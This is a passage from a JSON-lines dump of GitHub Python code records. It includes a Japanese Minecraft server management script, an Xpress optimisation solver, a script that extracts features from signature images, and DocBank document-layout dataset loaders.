point[0].encode('utf-8')))\nfh.close()","repo_name":"GolemMediaGmbH/OfficeTemperatureData","sub_path":"02_geochecks/207_checkcity_without_geo.py","file_name":"207_checkcity_without_geo.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"16"} +{"seq_id":"40949149275","text":"import subprocess\nimport linecache\nimport platform\nimport shutil\nimport time\nimport sys\nimport os\n\n\"\"\"自作プログラムの読み込み\"\"\"\nfrom Server import make\nfrom Server import proxy as proxy_program\nfrom Etc import etc\nfrom Etc import check\n\ndef exec_java(dir_name, jar_name, xms, xmx, java_argument=\"\"):\n \"\"\"javaを実行するための関数\"\"\"\n # もし入力内容が0かnotだったら1(1GB)に\n cmd = \"java -Xmx\"+xmx+\"G -Xms\"+xms+\"G -jar ./\"+jar_name+\" \"+java_argument\n subprocess.call(cmd, shell=True, cwd=dir_name+\"/\")\n\ndef select_server():\n \"\"\"サーバーを選択する関数\"\"\"\n minecraft_server_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-list.txt', encoding=\"utf-8\")])\n minecraft_server_dir_list_txt_lines_count = sum(\n [1 for _ in open('data/minecraft-dir-list.txt', encoding=\"utf-8\")])\n if not minecraft_server_dir_list_txt_lines_count == minecraft_server_list_txt_lines_count:\n print(\"txtファイルの行数が合わないため、続行できません。\")\n sys.exit(1)\n while True:\n with open(\"data/minecraft-list.txt\", \"r\", encoding=\"utf-8\") as file:\n lines = file.read()\n print(lines)\n choice_lines = input(\"サーバーの番号を入力してください: \")\n if not choice_lines or not choice_lines.isdigit():\n continue\n if int(minecraft_server_dir_list_txt_lines_count) < int(choice_lines):\n continue\n break\n return choice_lines\n\ndef start_server():\n \"\"\"サーバーを実行するための `準備` 関数\"\"\"\n print(\"サーバー起動モード\")\n print(\"起動するサーバーを選んでください\\n\")\n choice_server = select_server()\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n if not os.path.exists(path+\"/\"+start_jar):\n if os.path.exists(path+\"/\"+start_jar.replace(\".jar\", \"\")+\"-universal.jar\"):\n start_jar = start_jar.replace(\".jar\", \"\")+\"-universal.jar\"\n else:\n print(\"起動できません。\\nJarファイルが存在しません。\")\n sys.exit(6)\n exec_java(path, start_jar, mem_input[0], mem_input[1], java_argument=\"nogui\")\n\ndef change_port():\n \"\"\"サーバーのポートを再設定する関数\"\"\"\n print(\"サーバーポート変更モード\")\n print(\"ポートを変更する、サーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_port = input(\"再設定するポートを入力してください: \")\n if not input_port or not str.isnumeric(input_port):\n continue\n else:\n break\n make.file_identification_rewriting(path+\"/server.properties\",\n \"server-port=\", \"server-port=\"+input_port+\"\\n\")\n print(\"サーバーのポートを���更しました。\")\n\ndef change_max_player():\n \"\"\"最大参加人数を変更する関数\"\"\"\n print(\"サーバー最大参加人数の変更モード\")\n print(\"最大参加人数を変更したいサーバーを選択してください。\")\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n while True:\n input_max_player = input(\"再設定する最大参加人数を入力してください: \")\n if not input_max_player.isdigit():\n continue\n break\n \n make.file_identification_rewriting(path+\"/server.properties\", \"max-players=\", \"max-players=\"+input_max_player+\"\\n\")\n print(\"サーバーの最大参加人数を変更しました。\")\n\ndef add_startup():\n \"\"\"スタートアップ(LinuxではSystemdなど)にMinecraftを実行するbat-shファイルを登録する関数\"\"\"\n print(\"OS起動時 自動起動 設定モード\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n absolute_path = os.path.abspath(path)\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n if user_use_platfrom == \"Windows\":\n try:\n file = open(\"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\", mode='w')\n file.write(\"java -Xms{xms}G -Xmx{xmx}G -jar {abspath}/{jar_file} nogui \\n\\\n pause\".format(xms = choice_xms, xmx = choice_xmx, abspath = absolute_path, jar_file = start_jar))\n file.close()\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n try:\n file = open(\"/etc/systemd/system/minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\", mode='w')\n file.write(\"[Unit] \\\n \\nDescription=Minecraft Server: %i \\\n \\nAfter=network.target \\\n \\n[Service] \\\n \\nWorkingDirectory={woking_dir} \\\n \\nRestart=always \\\n \\nExecStart=/usr/bin/java -Xms{xms}G -Xmx{xmx}G -jar {jar_file} nogui \\\n \\n[Install] \\\n \\nWantedBy=multi-user.target\".format(woking_dir = absolute_path, xms = choice_xms, xmx = choice_xmx, jar_file = start_jar))\n file.close()\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n time.sleep(0.8)\n subprocess.run(\"sudo systemctl enable minecraft\"+path.replace('/', '').replace('minecraft', ''), shell=True)\n except Exception as excep:\n check.except_print(excep, \"\", True)\n else:\n print(\"その、OSは対応していません\")\n sys.exit(6)\n print(\"完了しました!\")\n\ndef del_startup():\n print(\"スタートアップ(自動起動設定)の削除\")\n check.is_admin()\n print(\"設定したいサーバーを選択してください。\")\n while True:\n user_use_platfrom = platform.system()\n choice_server = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_server)).replace('\\n', '')\n windows_startup_path = \"C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/\"\n linux_startup_path = \"/etc/systemd/system/\"\n if os.path.exists(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\") or os.path.exists(windows_startup_path + \"minecraft\" + path.replace('/', '').replace('minecraft', '') + \".bat\"):\n if user_use_platfrom == \"Windows\":\n try:\n os.remove(windows_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".bat\")\n except Exception as excep:\n check.except_print(excep, \"\", True)\n elif user_use_platfrom == \"Linux\":\n try:\n if not shutil.which('systemctl'):\n print(\"コマンド:Systemctlが見つかりません\")\n sys.exit(4)\n os.remove(linux_startup_path+\"minecraft\"+path.replace('/', '').replace('minecraft', '')+\".service\")\n subprocess.run(\"sudo systemctl daemon-reload\", shell=True)\n except Exception as excep:\n check.except_print(excep, \"\" , True)\n print(\"完了しました!\")\n else:\n print(\"その、サーバーは自動起動設定がされていません\")\n continue\n break\n\ndef make_sh():\n \"\"\"shとbatファイルを生成する関数\"\"\"\n choice_lines = select_server()\n path = linecache.getline('data/minecraft-dir-list.txt', int(choice_lines)).replace('\\n', '')\n while True:\n choice_xms = input(\"Xms(サーバー最小割当メモリ)を入力してください(G) ※数字のみ: \")\n choice_xmx = input(\"Xmx(サーバー最大割当メモリ)を入力してください(G) ※数字のみ: \")\n mem_input = [str(choice_xms), str(choice_xmx)]\n for i in mem_input:\n if not i.isdigit():\n continue\n if int(i) < 1:\n continue\n break\n start_jar = linecache.getline(\"data/\"+path.replace('/', '-')+\".txt\", 2).replace('\\n', '')\n file_name = [\"start.sh\", \"start.bat\"]\n for i in file_name:\n with open(path+\"/\"+i, 'w', encoding=\"utf-8\") as file:\n print(\"echo Start!\\n\",\n \"java -Xms\"+mem_input[0]+\"G\",\n \" -Xmx\"+mem_input[1]+\"G\",\n \" -jar \"+start_jar+\" --nogui\", file=file, sep='')\n print(\"sh-batファイルを作成しました。\")\n\ndef proxy():\n print(\"サーバープロキシモード\")\n local_host = \"127.0.0.1\"\n while True:\n local_port = input(\"出力するポートを入力してください: \")\n if not local_port.isdigit():\n continue\n break\n remote_host = input(\"元のサーバーのホスト名を入力してください: \")\n while True:\n remote_port = input(\"元のサーバーのポート番号を入力してください: \")\n if not remote_port.isdigit():\n continue\n break\n proxy_program.server_loop(local_host, int(local_port), remote_host, int(remote_port))\n print(\"接続が切断されました\")\n\ndef network_info():\n \"\"\"ネットワークのIPなどを確認できる関数\"\"\"\n print(\"\\n注意: IPを公開するのは、危険度が高いです。\\n\",\n \"IPアドレスは重要な情報です。(電話番号のようなものです。) \\n\",\n \"もし、あなたが配信やIPアドレスを見せたくない状況の場合には表示しないことをおすすめします。\",\n \"\\n`yes` か `no`を選択してください。\\n[Y/N]: \")\n network_info_select = etc.input_yes_no(\"\")\n if not network_info_select:\n return False\n active, global_ip, private_ip = check.network(\"https://ifconfig.me\")\n if not active:\n global_ip = \"取得できません。\"\n print(\"プライベートIP (同じネットワークで参加するために必要です。)\"+private_ip)\n print(\"グローバルIP (外のネットワークから参加するために必要です。)\"+global_ip)\n input()\ndef control_server():\n while True:\n print(\"\\nモードを選択してください。\\n\",\n \"サーバー起動モード[run]\\n\",\n \"サーバーポート変更モード[change-port]\\n\",\n \"shとbatファイル作成[sh],[bat]\\n\",\n \"ネットワークの情報確認モード[network]\\n\",\n \"最大参加人数の変更モード,[max-player]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の設定モード[add-startup]\\n\",\n \"スタートアップ(Windows)、Systemd(*Linux)での自動起動の解除モード[del-startup]\\n\",\n \"プロキシモード(テスト版)[proxy]\\n\",\n \"戻る | Exit (exit)\\n\",\n \"[R,C-P,S,B,N,M,A,D,P,E]: \", end=\"\")\n choice = input().lower()\n if choice in [\"run\", \"ru\", \"r\"]:\n start_server()\n elif choice in[\"c\", \"ch\", \"cha\", \"chan\", \"chang\",\"change\", \"change-\", \"change-p\", \"change-po\", \"change-por\", \"change-port\", \"port\"]:\n change_port()\n elif choice in[\"sh\", \"s\"]:\n make_sh()\n elif choice in[\"bat\", \"ba\", \"b\"]:\n make_sh()\n elif choice in[\"network\", \"networ\", \"netwo\", \"netw\", \"net\", \"ne\", \"n\"]:\n network_info()\n elif choice in[\"max-player\", \"max-playe\", \"max-play\", \"max-pla\", \"max-pl\", \"max-p\", \"max-\", \"max\", \"ma\", \"m\"]:\n change_max_player()\n elif choice in[\"add-startup\", \"add-startu\", \"add-start\", \"add-star\", \"add-sta\", \"add-st\", \"add-s\", \"add-\", \"add\", \"ad\", \"a\"]:\n add_startup()\n elif choice in[\"del-startup\",\"del-startu\",\"del-start\",\"del-star\",\"del-sta\",\"del-st\",\"del-s\",\"del-\",\"del\",\"de\",\"d\"]:\n del_startup()\n elif choice in [\"proxy\", \"prox\", \"pro\", \"pr\", \"p\"]:\n proxy()\n elif choice in[\"exit\", \"exi\", \"ex\", \"e\"]:\n break\n else:\n print(\"その項目はありません。\")\n","repo_name":"stsaria/Autoer-1","sub_path":"src/Server/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":13669,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74464619209","text":"from itertools import combinations\nimport xpress as xp\n\nimport numpy as np\n\n\nclass Solver:\n\n def __init__(self, accs, intervals):\n self.accs = accs\n self.accsNum = len(accs)\n self.intervals = intervals\n self.intNum = len(intervals)\n self.matches = np.array(list(combinations(self.accs, 2)))\n\n self.p = xp.problem()\n self.x = np.array([[[xp.var(vartype=xp.binary) for _ in intervals] for _ in accs] for _ in self.accs])\n self.m = np.array([xp.var(vartype=xp.binary) for _ in self.matches])\n\n self.p.addVariable(self.x, self.m)\n\n def set_constraints(self):\n # t is the index of the time period\n\n for acc in self.accs:\n # no self colab\n for t in range(self.intNum):\n self.p.addConstraint(self.x[acc.index, acc.index, t] == 0)\n\n self.p.addConstraint(xp.Sum(self.m[k] for k in self.get_acc_matches(acc)) <= 1)\n\n # colab with only one for each interval\n for acc_A in self.accs:\n for t in range(self.intNum):\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for acc_B in self.accs) <= 1\n )\n\n k = 0\n for match in self.matches:\n acc_A, acc_B = match[0], match[1]\n self.p.addConstraint(\n xp.Sum(self.x[acc_A.index, acc_B.index, t] for t in range(self.intNum)) <= self.m[k]\n )\n k += 1\n\n def get_acc_matches(self, acc):\n indexes = []\n k = 0\n for match in self.matches:\n if acc.index == match[0].index or acc.index == match[1].index:\n indexes.append(k)\n k += 1\n\n return indexes\n","repo_name":"andygaspar/Natalia","sub_path":"Solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5594543740","text":"import numpy as np\r\nimport cv2\r\nimport math\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import interpolation as inter\r\nim = cv2.imread('binary3.png',0)\r\nnpim=np.array(im)\r\n\r\nnp1d=np.ndarray.flatten(im)\r\n\r\n#Calculate the center of gravity of image\r\n\r\ncog=ndimage.measurements.center_of_mass(npim)\r\n\r\n#Calculate the entropy of the image\r\n\r\ndef entropy(signal):\r\n '''\r\n function returns entropy of a signal\r\n signal must be a 1-D numpy array\r\n '''\r\n lensig=signal.size\r\n symset=list(set(signal))\r\n numsym=len(symset)\r\n propab=[np.size(signal[signal==i])/(1.0*lensig) for i in symset]\r\n ent=np.sum([p*np.log2(1.0/p) for p in propab])\r\n return ent\r\n\r\nentr=entropy(np1d)\r\n\r\n\r\n#Finding contours of the image\r\n\r\nimage, contours, hierarchy = cv2.findContours(im,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n#The first contour\r\n\r\ncon=contours[0]\r\n\r\n#Finding the rightmost contour point\r\n\r\nmaxi=0\r\nmaxj=0\r\n\r\nfor i in range(1,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==0):\r\n if(c[j]>maxi):\r\n maxi=c[j]\r\n maxj=c[j+1]\r\n\r\n#Finding the bottom most contour point\r\n\r\nbottompointy=0\r\nbottompointx=0\r\n\r\nhighestpointy=200\r\n\r\nfor i in range(0,len(contours)):\r\n c=contours[i].reshape(-1)\r\n c=c.flatten()\r\n #print(len(c))\r\n for j in range(0,len(c)):\r\n if(j%2==1):\r\n if(c[j]>bottompointy):\r\n bottompointy=c[j]\r\n bottompointx=c[j-1]\r\n if(c[j]<highestpointy):\r\n highestpointy=c[j]\r\n#print(\"Lowest signature point=\",bottompointx,\" , \", bottompointy)\r\n#print(\"Leftmost signature point=\",maxi,\" , \",maxj)\r\ncon=con.reshape(-1)\r\ncon=con.flatten()\r\nmini=con[0]\r\nminj=con[1]\r\n#print(\"Min point \",mini,\" , \", minj)\r\nheight=bottompointy-highestpointy\r\nwidth=maxi-mini\r\n#print(\"Height=\", height )\r\n#print(\"Width=\", width )\r\n\r\n#Finding the aspect ratio of the image\r\n\r\naspectratio=width/height\r\n\r\n#Finding the slope of the image\r\n\r\nslope=math.degrees(math.atan((maxj-minj)/(maxi-mini)))\r\n\r\n#Finding the skewness of the image\r\n\r\ndef find_score(arr, angle):\r\n data = inter.rotate(arr, angle, reshape=False, order=0)\r\n hist = np.sum(data, axis=1)\r\n score = np.sum((hist[1:] - hist[:-1]) ** 2)\r\n return hist, score\r\n\r\n\r\ndelta = 1\r\nlimit = 5\r\nangles = np.arange(-limit, limit+delta, delta)\r\nscores = []\r\nfor angle in angles:\r\n hist, score = find_score(npim, angle)\r\n scores.append(score)\r\n\r\nbest_score = max(scores)\r\nbest_angle = angles[scores.index(best_score)]\r\nprint('Best angle:',best_angle)\r\nprint(\"Slope Angle=\",slope)\r\nprint(\"Center of mass=\",cog)\r\nprint(\"Aspect ratio=\",aspectratio)\r\nprint(\"Entropy= \" +str(entr))\r\n","repo_name":"pratikIT95/Deep-Learning-Based-Offline-Signature-Verification","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28725818861","text":"from typing import List, Union, Dict, Any, Tuple, Optional\nimport os\nimport random\nimport json\nimport itertools\nfrom collections import Counter\nimport cv2\n\nimport torch\nimport pandas as pd\nimport layoutparser as lp\nfrom tqdm import tqdm\nfrom torch.utils.data import Dataset, DataLoader\nfrom PIL import Image\n\n\nDEFAULT_COLOR_MAP = {\n None: \"#C0C0C0\",\n \"abstract\": \"#ffb6c1\",\n \"author\": \"#02028b\",\n \"caption\": \"#00ff03\",\n \"date\": \"#0f0000\",\n \"equation\": \"#ff0000\",\n \"figure\": \"#ff01ff\",\n \"footer\": \"#C2C2C2\",\n \"list\": \"#302070\",\n \"paragraph\": \"#b0c4de\",\n \"reference\": \"#309000\",\n \"section\": \"#0603ff\",\n \"table\": \"#01ffff\",\n \"title\": \"#00bfff\",\n}\n\nDEFAULT_LABEL_MAP = {\n \"paragraph\": 0,\n \"title\": 1,\n \"equation\": 2,\n \"reference\": 3,\n \"section\": 4,\n \"list\": 5,\n \"table\": 6,\n \"caption\": 7,\n \"author\": 8,\n \"abstract\": 9, # 522\n \"footer\": 10, # 10\n \"date\": 11, # 4\n \"figure\": 12,\n}\n\n\ndef _load_json(filename):\n with open(filename, \"r\") as fp:\n return json.load(fp)\n\n\ndef _write_json(data, filename):\n\n with open(filename, \"w\") as fp:\n json.dump(data, fp)\n\n\nclass DocBankDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n image_folder_name=\"DocBank_500K_ori_img\",\n text_folder_name=\"DocBank_500K_txt\",\n annotation_loading_format=\"layout\",\n cleanup_annotations=True,\n load_image=True,\n ):\n \"\"\"A dataloader for the original DocBank Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`/\n ├───`image_folder_name`/\n │ └───`name`_ori.jpg\n └───`text_folder_name`/\n └───`name`.txt\n\n Args:\n path (str): The root dir of the docbank dataset\n image_folder_name (str, optional):\n The folder_name for saving all images in the docbank dataset,\n Defaults to \"DocBank_500K_ori_img\".\n text_folder_name (str, optional):\n The folder_name for saving all token+category annotations\n Defaults to \"DocBank_500K_txt\".\n annotation_loading_format (str, optional):\n Load annotation as \"layout\" or \"dataframe\"\n Defaults to \"layout\".\n cleanup_annotations (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n load_image (bool, optional):\n Whether to load images.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.image_path = self.base_path + \"/\" + image_folder_name\n self.text_path = self.base_path + \"/\" + text_folder_name\n\n self.all_index = [ele.rstrip(\".txt\") for ele in os.listdir(self.text_path)]\n\n self._empty_df = pd.DataFrame(\n columns=[\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n )\n\n self.export_layout = annotation_loading_format == \"layout\"\n self.cleanup_annotations = cleanup_annotations\n self.load_image = load_image\n\n def load_annotations(\n self, filename: str, cleanup=True, export_layout=True\n ) -> Union[pd.DataFrame, lp.Layout]:\n \"\"\"Load data annotations as a dataframe\n\n Args:\n filename (str): the abspath to the txt file\n cleanup (bool, optional):\n Whether to cleanup the annotation files, i.e., dropping\n \"##LTLine##\" and \"##LTFigure##\" from the annotation file\n Defaults to True.\n export_layout (bool, optional):\n Whether to convert the output format as lp.Layout format.\n Defaults to True.\n\n Returns:\n Union[pd.DataFrame, lp.Layout]:\n When export_layout=true, return a lp.Layout including all tokens\n Otherwise return a DataFrame.\n Note: the file could be empty.\n \"\"\"\n if os.stat(filename).st_size == 0:\n # Check empty file\n if export_layout:\n return lp.Layout([])\n else:\n return self._empty_df\n\n df = pd.read_csv(filename, sep=\"\\t\", header=None, encoding=\"utf-8\", quoting=3)\n df.columns = [\"text\", \"x_1\", \"y_1\", \"x_2\", \"y_2\", \"R\", \"G\", \"B\", \"font\", \"type\"]\n df[\"text\"] = df[\"text\"].astype(\"str\")\n df = df.reset_index()\n\n if cleanup:\n # Drop all ltline and ltfigure tokens\n df = df[(df[\"text\"] != \"##LTLine##\") & (df[\"text\"] != \"##LTFigure##\")]\n\n if export_layout:\n\n def convert_row_to_rectbox(row):\n rectbox = lp.TextBlock(\n lp.Rectangle(row[\"x_1\"], row[\"y_1\"], row[\"x_2\"], row[\"y_2\"]),\n text=row[\"text\"],\n type=row[\"type\"],\n id=row[\"index\"],\n )\n rectbox.font = row[\"font\"]\n return rectbox\n\n layout = df.apply(convert_row_to_rectbox, axis=1).tolist()\n return lp.Layout(layout)\n else:\n return df\n\n def get_text_anno_path(self, name: str) -> str:\n return os.path.join(self.text_path, name + \".txt\")\n\n def get_image_path(self, name: str) -> str:\n return os.path.join(self.image_path, name + \"_ori.jpg\")\n\n def __getitem__(\n self, idx: int\n ) -> Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[\"Image\"]]:\n \"\"\"Return the name, layout, and image for an item in the dataset.\n\n Returns:\n Tuple[str, Union[pd.DataFrame, lp.Layout], Optional[Image]]:\n the filename of the given item,\n the token info and category annotation\n the image of the file (when self.load_image==True)\n \"\"\"\n\n name = self.all_index[idx]\n\n text_anno_name = self.get_text_anno_path(name)\n text_anno = self.load_annotations(\n text_anno_name, self.cleanup_annotations, self.export_layout\n )\n\n if not self.load_image:\n return name, text_anno\n\n image_anno_name = self.get_image_path(name)\n image = Image.open(image_anno_name)\n w, h = image.size\n text_anno = text_anno.scale((w / 1000, h / 1000))\n # scale the text annotaiton to image size\n return name, text_anno, image\n\n\nclass DocBankBlockClassificationDataset(Dataset):\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n ):\n \"\"\"A dataloader for the DocBank Block Classification Dataset.\n\n The directory structure is shown as follows:\n\n `base_path`\n ├───dev.json\n ├───train.json\n └───test.json\n\n This dataset is used for training the block text classification model\n in the pipeline method. It is generated by using the blocks predicted by\n visual layout detection models. These models generate block level bounding\n boxes, and we use these blocks for grouping tokens from the docbank dataset.\n It is generated by the xxx.py script, and all the token data is stored in the\n JSON files for better IO performance.\n\n The JSON contains the following fields:\n\n {\n \"data\": a list of block text data, specified below,\n \"labels\": a dict used (label_id, label_name) for the data,\n \"problematic_items\": optional, see below\n }\n\n As for each data item, it is saved as:\n {\n \"words\": a list of words in the text block,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": the label_id for this block.\n }\n\n\n Note: Sometimes we might have some tokenization bugs from the dataset. To avoid it from\n disrupting the training process, we can identify these item indices before training and\n excluding them from being loaded during training. These indices are stored in the JSON\n as well, under the field \"problematic_items\".\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder.\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n\n # TODO: Update the filename and link in the docstring\n\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n _data = raw_data[\"data\"]\n self.labels = raw_data[\"labels\"]\n\n self._data = []\n for ele in _data:\n if ele != {} and len(ele[\"words\"]) == len(ele[\"bbox\"]):\n ele[\"words\"] = [str(word) for word in ele[\"words\"]]\n self._data.append(ele)\n\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n del raw_data\n\n def __getitem__(self, idx):\n if not self.encode_first:\n return self._data[self._all_indices[idx]]\n else:\n if self._encoded_data is None:\n raise ValueError(\"Please run self.encode_data(tokenizer) first\")\n return self._encoded_data[idx]\n\n def __len__(self):\n return len(self._all_indices)\n\n def index_or_load_problematic_items(self, raw_data: Dict) -> List[int]:\n if \"problematic_items\" not in raw_data:\n print(\"problematic_items are not loaded.\")\n error_idx = []\n else:\n print(\"Loading problematic items from file\")\n error_idx = raw_data.get(\"problematic_items\", [])\n return error_idx\n\n def encode_data(self, tokenizer):\n\n self._encoded_data = []\n\n for idx in tqdm(self._all_indices):\n self._encoded_data.append(tokenizer.encode_plus([self._data[idx]]))\n\n\nclass DocBankBlockEmbeddingDataset(DocBankBlockClassificationDataset):\n \"\"\"\"\"\"\n\n LONG_PASSAGE_THRESHOLD = 752\n MAX_SEQ_LEN = 512\n MAX_BLOCK_EMBEDDING_NUMBER = 32\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n \"\"\"A dataloader for the DocBank Block Embedding Dataset.\n\n This dataset is used for training the block embedding LayoutLM model\n It is generated similar to `DocBankBlockClassificationDataset`.\n\n Different from DocBankBlockClassificationDataset, for each data item,\n it stores all text for a page, and also includes a new field call block_ids:\n {\n \"words\": a list of words for the whole page,\n \"bbox\": a list of block bounding boxes for all words,\n \"labels\": a list of label_ids for all tokens,\n \"block_ids\": the block ids for each token on this page\n }\n\n Args:\n base_path (str):\n The basepath of the docbank dataset folder\n subset (str):\n The name of the used subset, in \"train\", \"dev\", or \"test\".\n select_n (int, optional):\n The number of instances will be used during training.\n Defaults to None.\n select_ratio (float, optional):\n The fraction of dataset will be used during training.\n Defaults to None.\n filename (str, optional):\n By default, the loading filename will be the same as the `base_path`/`subset`.json.\n But you could set it specifically to override the default filename: `base_path`/`filename`.json\n Defaults to None.\n encode_first (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n add_class_weight (bool, optional):\n Whether to encode the dataset ahead.\n Defaults to False.\n \"\"\"\n self.base_path = base_path\n\n self.filename = f\"{base_path}/{subset}.json\"\n if filename is not None:\n self.filename = f\"{base_path}/{filename}\"\n print(f\"Loading from {self.filename}\")\n raw_data = _load_json(self.filename)\n\n self.labels = raw_data[\"labels\"]\n self.files = raw_data.get('files')\n\n self._data = raw_data[\"data\"]\n self._all_indices = list(range(len(self._data)))\n\n error_idx = self.index_or_load_problematic_items(raw_data)\n\n print(f\"Dropping problematic items {error_idx}\")\n for ele in sorted(error_idx, reverse=True):\n # Remove the problematic indices\n # Start from the last to avoid indices shift in the loop\n del self._all_indices[ele]\n\n # NEW IN THIS CLASS\n print(\"Dropping pages of many blocks\")\n self._all_indices = [\n ele\n for ele in self._all_indices\n if max(self._data[ele][\"block_ids\"]) + 1 < self.MAX_BLOCK_EMBEDDING_NUMBER\n ]\n # Because 0 is reserved for \"tokens not in any blocks\"\n\n if select_n is not None:\n self._all_indices = random.sample(self._all_indices, select_n)\n elif select_ratio is not None:\n self._all_indices = random.sample(\n self._all_indices, int(len(self._all_indices) * select_ratio)\n )\n\n self.encode_first = encode_first\n self._encoded_data = None\n\n self.add_class_weight = add_class_weight\n if self.add_class_weight:\n results = list(\n itertools.chain.from_iterable(\n [self._data[idx][\"labels\"] for idx in self._all_indices]\n )\n )\n cnts = Counter(results)\n freq = torch.Tensor([cnts[i] for i in range(len(self.labels))])\n self.class_weight = -torch.log(freq / freq.sum())\n\n n_gpus = torch.cuda.device_count()\n if n_gpus > 1:\n self.class_weight = self.class_weight.unsqueeze(0).repeat(n_gpus, 1)\n\n del raw_data\n\n def __getitem__(self, idx):\n\n item = self._data[self._all_indices[idx]]\n word_count = len(item[\"words\"])\n\n # For longer articles, BERT will only select the first 512 tokens.\n # To expose the model with the tailing text in these longer passages,\n # we randomly sample the starting point.\n\n if word_count > self.LONG_PASSAGE_THRESHOLD:\n start = random.choice([0, word_count - self.MAX_SEQ_LEN])\n item = {key: val[start:word_count] for key, val in item.items()}\n\n if self.add_class_weight:\n item[\"class_weight\"] = self.class_weight\n return item\n\nclass DocBankImageFeatureDataset(DocBankBlockEmbeddingDataset):\n\n def __init__(\n self,\n base_path: str,\n subset: str,\n image_directory=str,\n filename: str = None,\n select_n=None,\n select_ratio=None,\n encode_first=False,\n add_class_weight=False,\n ):\n\n super().__init__(\n base_path = base_path,\n subset = subset,\n filename = filename,\n select_n = select_n,\n select_ratio = select_ratio,\n encode_first = encode_first,\n add_class_weight = add_class_weight,\n )\n\n self.image_directory = image_directory\n\n def __getitem__(self, idx):\n\n item = super().__getitem__(idx)\n \n image_filename = self.files[self._all_indices[idx]].replace('.txt', 